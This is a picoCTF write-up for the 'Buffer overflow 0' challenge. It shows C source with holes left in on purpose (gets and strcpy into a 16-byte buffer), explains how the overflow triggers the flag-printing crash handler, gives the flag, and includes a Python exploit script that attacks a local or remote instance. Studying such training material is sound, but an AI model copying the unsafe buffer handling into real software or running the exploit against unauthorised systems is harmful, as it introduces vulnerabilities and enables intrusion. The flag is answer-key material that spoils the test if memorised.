# Info
:::info
- Question: Buffer overflow 0
- From: picoCTF Binary Exploitation
- Difficulty: 100 points
:::

---

# Table of Contents
:::info
[TOC]
:::

---

# Challenge

Let's start off simple, can you overflow the correct buffer?

Additional details will be available after launching your challenge instance.

```c=
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>   // added: declares getegid() and setresgid()

#define FLAGSIZE_MAX 64

char flag[FLAGSIZE_MAX];

// Installed for SIGSEGV below: any segmentation fault prints the flag.
void sigsegv_handler(int sig) {
  printf("%s\n", flag);
  fflush(stdout);
  exit(1);
}

// Intentionally vulnerable: strcpy() has no length check, so anything
// longer than 16 bytes overruns buf2 into the saved frame pointer and
// return address of this frame.
void vuln(char *input){
  char buf2[16];
  strcpy(buf2, input);
}

int main(int argc, char **argv){
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }
  fgets(flag,FLAGSIZE_MAX,f);
  signal(SIGSEGV, sigsegv_handler); // Set up signal handler

  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  printf("Input: ");
  fflush(stdout);
  char buf1[100];
  gets(buf1);   // intentionally vulnerable: gets() does not bound the read either
  vuln(buf1);
  printf("The program will exit now\n");
  return 0;
}
```

---

# Solution

## Concept

Reading the source, the only path that prints the flag is `sigsegv_handler`, which `main` registers with `signal(SIGSEGV, ...)`, so the program has to be made to crash with a segmentation fault. The crash is easy to provoke: `gets(buf1)` reads an unbounded line, and `vuln()` then copies it into the 16-byte `buf2` with `strcpy`, which also has no length check. Sending far more than 16 bytes overruns `buf2`, overwrites the saved frame pointer and return address in `vuln`'s stack frame, and `vuln` returns to a garbage address. The resulting SIGSEGV runs the handler, which prints the flag. In other words, just type a long string of characters at the `Input:` prompt and let it clobber what it should not.

![](https://i.imgur.com/ZgXjCfe.png)

As shown in the screenshot above, the flag is `picoCTF{ov3rfl0ws_ar3nt_that_bad_ef01832d}`.
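The same attack, scripted so it can be replayed against a local build or the challenge instance. This is an added example and not part of the original writeup: the binary path, host and port are whatever you pass on the command line, and the flag regex assumes the standard `picoCTF{...}` format.

```python
"""Exploit helper for picoCTF "Buffer overflow 0" (added example, not from the writeup)."""
import re
import socket
import subprocess

# picoCTF flag format; the SIGSEGV handler prints the whole flag.txt line.
FLAG_RE = re.compile(rb"picoCTF\{[^}]*\}")

BUF2_SIZE = 16  # char buf2[16] in vuln()


def build_payload(length: int = 4 * BUF2_SIZE) -> bytes:
    """Input line that overruns buf2. gets() stops at the newline, so the
    payload is filler plus one '\n'. 64 bytes is more than enough to cover
    buf2, any alignment padding, the saved frame pointer and the return
    address on both 32- and 64-bit builds."""
    if length <= BUF2_SIZE:
        raise ValueError("payload must exceed buf2 to smash the frame")
    return b"A" * length + b"\n"


def extract_flag(output: bytes):
    """Return the flag printed by sigsegv_handler, or None if the program
    exited normally (no crash means no flag)."""
    m = FLAG_RE.search(output)
    return m.group(0).decode() if m else None


def exploit_local(binary: str, length: int = 4 * BUF2_SIZE):
    """Run a local copy (needs flag.txt in the cwd) and return the flag."""
    proc = subprocess.run([binary], input=build_payload(length),
                          capture_output=True, timeout=10)
    return extract_flag(proc.stdout)


def exploit_remote(host: str, port: int, length: int = 4 * BUF2_SIZE):
    """Same attack against the challenge instance over a raw TCP socket."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.recv(1024)                      # consume the "Input: " prompt
        s.sendall(build_payload(length))
        data = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return extract_flag(data)


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:
        print(exploit_local(sys.argv[1]))
    elif len(sys.argv) == 3:
        print(exploit_remote(sys.argv[1], int(sys.argv[2])))
    else:
        print(f"usage: {sys.argv[0]} ./vuln | {sys.argv[0]} HOST PORT")
```

One caveat worth knowing: this trick only works because the crash is a SIGSEGV. If the binary had been built with stack canaries (`-fstack-protector`), smashing `buf2` would instead be caught by `__stack_chk_fail`, which aborts the process with SIGABRT, and the SIGSEGV handler would never run.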